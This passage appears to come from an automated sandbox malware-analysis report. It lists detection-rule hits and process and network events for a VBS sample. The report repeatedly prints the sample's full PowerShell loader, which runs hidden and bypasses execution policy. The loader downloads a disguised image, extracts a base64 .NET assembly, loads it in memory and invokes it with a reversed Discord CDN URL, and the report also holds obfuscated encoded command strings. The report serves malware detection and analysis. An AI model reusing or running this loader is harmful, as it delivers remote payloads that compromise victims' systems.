TreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method =
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
          Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 180, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49704
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs", ProcessId: 180, ProcessName: wscript.exe
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 180, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49704
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method =
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method =
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs", ProcessId: 180, ProcessName: wscript.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 